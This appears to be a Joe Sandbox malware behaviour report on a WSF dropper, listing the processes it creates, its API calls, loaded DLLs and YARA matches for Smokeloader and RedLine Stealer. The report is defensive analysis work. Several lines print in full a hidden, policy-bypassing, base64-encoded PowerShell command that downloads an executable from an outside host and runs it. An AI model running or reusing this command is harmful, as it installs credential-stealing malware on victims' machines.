        Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}Jump to behavior
        Source: C:\Windows\System32\wscript.exeCOM Object queried: Shell Automation Service HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{13709620-C279-11CE-A49E-444553540000}Jump to behavior
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powErshEll -nop -w hiddEn -Ep bypass -Enc JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA=
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powErshEll -nop -w hiddEn -Ep bypass -Enc JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA=
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powErshEll -nop -w hiddEn -Ep bypass -Enc JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA=Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powErshEll -nop -w hiddEn -Ep bypass -Enc JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA=Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\oBuf.exeCode function: 5_2_00401529 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_00401529
        Source: C:\Users\user\AppData\Local\Temp\oBuf.exeCode function: 5_2_00402FFA RtlCreateUserThread,NtTerminateProcess,5_2_00402FFA
        Source: C:\Users\user\AppData\Local\Temp\oBuf.exeCode function: 5_2_00401541 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_00401541
        Source: C:\Users\user\AppData\Local\Temp\oBuf.exeCode function: 5_2_00401545 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_00401545
        Source: C:\Users\user\AppData\Local\Temp\oBuf.exeCode function: 5_2_00401553 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_00401553
        Source: C:\Users\user\AppData\Local\Temp\oBuf.exeCode function: 5_2_00402379 NtQuerySystemInformation,5_2_00402379
        Source: C:\Users\user\AppData\Local\Temp\oBuf.exeCode function: 5_2_0040237B NtQuerySystemInformation,5_2_0040237B
        Source: C:\Users\user\AppData\Local\Temp\oBuf.exeCode function: 5_2_00401534 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_00401534
        Source: C:\Users\user\AppData\Local\Temp\oBuf.exeCode function: 5_2_004014DB NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_004014DB
        Source: C:\Users\user\AppData\Local\Temp\oBuf.exeCode function: 5_2_004020EA NtQuerySystemInformation,5_2_004020EA
        Source: C:\Users\user\AppData\Local\Temp\oBuf.exeCode function: 5_2_00402387 NtQuerySystemInformation,5_2_00402387
        Source: C:\Users\user\AppData\Local\Temp\oBuf.exeCode function: 5_2_00402397 NtQuerySystemInformation,5_2_00402397
        Source: C:\Users\user\AppData\Local\Temp\oBuf.exeCode function: 5_2_0040239B NtQuerySystemInformation,5_2_0040239B
        Source: C:\Users\user\AppData\Local\Temp\oBuf.exeCode function: 5_2_0040239E NtQuerySystemInformation,5_2_0040239E
        Source: C:\Users\user\AppData\Roaming\fbhbvciCode function: 9_2_00401529 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,9_2_00401529
        Source: C:\Users\user\AppData\Roaming\fbhbvciCode function: 9_2_00402FFA RtlCreateUserThread,NtTerminateProcess,9_2_00402FFA
        Source: C:\Users\user\AppData\Roaming\fbhbvciCode function: 9_2_00401541 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,9_2_00401541
        Source: C:\Users\user\AppData\Roaming\fbhbvciCode function: 9_2_00401545 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,9_2_00401545
        Source: C:\Users\user\AppData\Roaming\fbhbvciCode function: 9_2_00401553 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,9_2_00401553
        Source: C:\Users\user\AppData\Roaming\fbhbvciCode function: 9_2_00402379 NtQuerySystemInformation,9_2_00402379
        Source: C:\Users\user\AppData\Roaming\fbhbvciCode function: 9_2_0040237B NtQuerySystemInformation,9_2_0040237B
        Source: C:\Users\user\AppData\Roaming\fbhbvciCode function: 9_2_00401534 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,9_2_00401534
        Source: C:\Users\user\AppData\Roaming\fbhbvciCode function: 9_2_004014DB NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,9_2_004014DB
        Source: C:\Users\user\AppData\Roaming\fbhbvciCode function: 9_2_004020EA NtQuerySystemInformation,9_2_004020EA
        Source: C:\Users\user\AppData\Roaming\fbhbvciCode function: 9_2_00402387 NtQuerySystemInformation,9_2_00402387
        Source: C:\Users\user\AppData\Roaming\fbhbvciCode function: 9_2_00402397 NtQuerySystemInformation,9_2_00402397
        Source: C:\Users\user\AppData\Roaming\fbhbvciCode function: 9_2_0040239B NtQuerySystemInformation,9_2_0040239B
        Source: C:\Users\user\AppData\Roaming\fbhbvciCode function: 9_2_0040239E NtQuerySystemInformation,9_2_0040239E
        Source: C:\Users\user\AppData\Local\Temp\oBuf.exeCode function: 5_2_00418A705_2_00418A70
        Source: C:\Windows\explorer.exeCode function: 8_2_07D728D08_2_07D728D0
        Source: C:\Windows\explorer.exeCode function: 8_2_07DC28D08_2_07DC28D0
        Source: C:\Users\user\AppData\Roaming\fbhbvciCode function: 9_2_00418A709_2_00418A70
        Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\oBuf.exe F488B4EB65D5F5339401FC0869E614433719E64A5156945B530F98C7D39452E1
        Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\fbhbvci F488B4EB65D5F5339401FC0869E614433719E64A5156945B530F98C7D39452E1
        Source: UkHkCa3IYV.wsfInitial sample: Strings found which are bigger than 50
        Source: 00000008.00000002.2949689441.0000000007DC1000.00000020.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
        Source: 00000005.00000002.1994744005.00000000006B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
        Source: 00000005.00000002.1994821763.00000000006E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
        Source: 00000009.00000002.2270864226.000000000082D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
        Source: 00000008.00000002.2949612215.0000000007D71000.00000020.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
        Source: 00000009.00000002.2270678080.00000000007C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
        Source: 00000009.00000002.2270658140.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
        Source: 00000005.00000002.1994949567.000000000078E000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
        Source: 00000009.00000002.2270739394.00000000007F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
        Source: 00000005.00000002.1994716777.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
        Source: oBuf.exe.3.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: fbhbvci.8.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: classification engineClassification label: mal100.troj.expl.evad.winWSF@9/6@3/2
        Source: C:\Users\user\AppData\Local\Temp\oBuf.exeCode function: 5_2_0079143F CreateToolhelp32Snapshot,Module32First,5_2_0079143F
        Source: C:\Windows\explorer.exeCode function: 8_2_07D73678 CoCreateInstance,8_2_07D73678
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6312:120:WilError_03
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4fhvtjey.run.ps1Jump to behavior
        Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
        Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: UkHkCa3IYV.wsfReversingLabs: Detection: 26%
        Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\UkHkCa3IYV.wsf"
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powErshEll -nop -w hiddEn -Ep bypass -Enc JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA=
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powErshEll -nop -w hiddEn -Ep bypass -Enc JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA=
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\oBuf.exe "C:\Users\user\AppData\Local\Temp\oBuf.exe"
        Source: unknownProcess created: C:\Users\user\AppData\Roaming\fbhbvci C:\Users\user\AppData\Roaming\fbhbvci
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powErshEll -nop -w hiddEn -Ep bypass -Enc JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA=Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powErshEll -nop -w hiddEn -Ep bypass -Enc JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA=Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\oBuf.exe "C:\Users\user\AppData\Local\Temp\oBuf.exe" Jump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: pcacli.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: sfc_os.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
